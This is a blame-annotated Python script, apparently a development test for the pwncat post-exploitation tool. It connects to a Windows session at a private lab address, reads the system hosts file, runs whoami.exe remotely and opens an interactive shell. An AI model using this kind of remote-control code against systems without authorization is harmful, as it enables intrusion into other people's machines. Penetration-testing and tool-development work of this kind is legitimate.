2020-12-30 06:36:54 +01:00
|
|
|
#!./env/bin/python
|
2021-01-04 00:22:17 +01:00
|
|
|
import subprocess
|
|
|
|
|
2020-12-30 06:36:54 +01:00
|
|
|
import pwncat.manager
|
2021-01-04 00:22:17 +01:00
|
|
|
import pwncat.platform.windows
|
2021-01-02 00:53:13 +01:00
|
|
|
import time
|
2020-12-30 06:36:54 +01:00
|
|
|
|
|
|
|
# Create a manager
|
|
|
|
manager = pwncat.manager.Manager("data/pwncatrc")
|
|
|
|
|
|
|
|
# Establish a session
|
|
|
|
session = manager.create_session("windows", host="192.168.122.11", port=4444)
|
|
|
|
|
2021-01-04 00:22:17 +01:00
|
|
|
# manager.interactive()
|
2021-01-11 00:01:08 +01:00
|
|
|
|
|
|
|
hosts = (
|
|
|
|
session.platform.Path("C:\\") / "Windows" / "System32" / "drivers" / "etc" / "hosts"
|
|
|
|
)
|
|
|
|
with hosts.open() as filp:
|
|
|
|
manager.log("Read etc hosts:")
|
|
|
|
manager.log(filp.read())
|
|
|
|
|
|
|
|
p = session.platform.Popen(["whoami.exe"], stdout=subprocess.PIPE, text=True)
|
|
|
|
manager.log(f"Current user: {p.communicate()[0].strip()}")
|
|
|
|
manager.log(f"Process Exit Status: {p.returncode}")
|
|
|
|
|
|
|
|
manager.interactive()
|